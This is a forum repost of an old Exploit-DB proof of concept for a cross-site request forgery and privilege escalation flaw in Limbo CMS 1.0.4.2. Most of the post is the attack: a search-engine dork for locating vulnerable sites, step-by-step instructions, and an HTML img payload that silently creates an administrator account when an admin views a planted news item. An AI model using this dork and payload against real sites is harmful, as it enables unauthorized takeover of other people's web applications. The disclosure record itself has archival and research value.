Exploit Limbo CMS 1.0.4.2 - Cross-Site Request Forgery / Privilege Escalation

Exploiter

Хакер
34,644
0
18 Дек 2022
EDB-ID
8468
Проверка EDB
  1. Пройдено
Автор
ALFONS LUJA
Тип уязвимости
WEBAPPS
Платформа
PHP
CVE
N/A
Дата публикации
2009-04-17
Код:
###############################
#                             #
#  Limbo cms v 1042Lt         #
#  Cross-site request forgery #
#  Privilege Escalation       #
#  Proof of Concept           #
#  by Alfons Luja             #
#                             #
###############################
download : http://www.limboportal.com/index.php/option/downloads/task/download/id/67
d00rk: intext:"site powered by limbo"  inurl:task=register

  Sytuacion is similar to last vuln in Coppermine 
  http://milw0rm.com/exploits/8114
  
  We need privilege to add news 
  if we have it then:
 
  1]. Go to : http://target/~limbo/index.php?option=content&task=new&Itemid=[id]

  2]. Set Title : whatever

      Select Category : whatever

      Set Intro text : 

      <img src="http://target/~limbo/admin.php?com_option=users&task=create&user_id=&user_name=toxiclove&user_username=echo&user_email=skk%40sk.pl&user_gid=5&user_password=test1"/>
      (some html tags is not filtered)

      Set Main Text : whatever 
      And submit 
  
  3]. When admin open this "new" in Control Panel 
      User toxiclove witch login = echo , pass = test1 && Administartor privilage 
      Become create 

  4]. The end 
      Greetings: 
      tyko dla babci i Gorionka , sIdq , condiego , 0ina , J.Busha , Nejmo , and all friend in a whole planet
      Sorry for my poor english ;D

# milw0rm.com [2009-04-17]
 
Источник
www.exploit-db.com

Похожие темы